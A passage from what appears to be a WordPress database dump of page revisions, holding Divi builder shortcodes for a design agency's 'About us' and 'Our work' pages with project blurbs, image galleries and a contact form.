background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2021-03-18 06:30:04','2021-03-18 06:30:04','',392,'https://wthtest1.in8.cdn-alpha.com/392-revision-v1/',0,'revision','',0),(781,1,'2021-03-18 06:35:22','2021-03-18 06:35:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"digital agency in delhi\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud Hair Spray - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Zap Booking - Flyer/Emailer Design\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design \" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Neud After Lotion - Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>Yet another revolutionary product with brilliant design execution. Corporate brand colors has been used to give it a rich and luxurious feel. Brilliant product mockup and various concept based mockup has given life to the product.</p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" 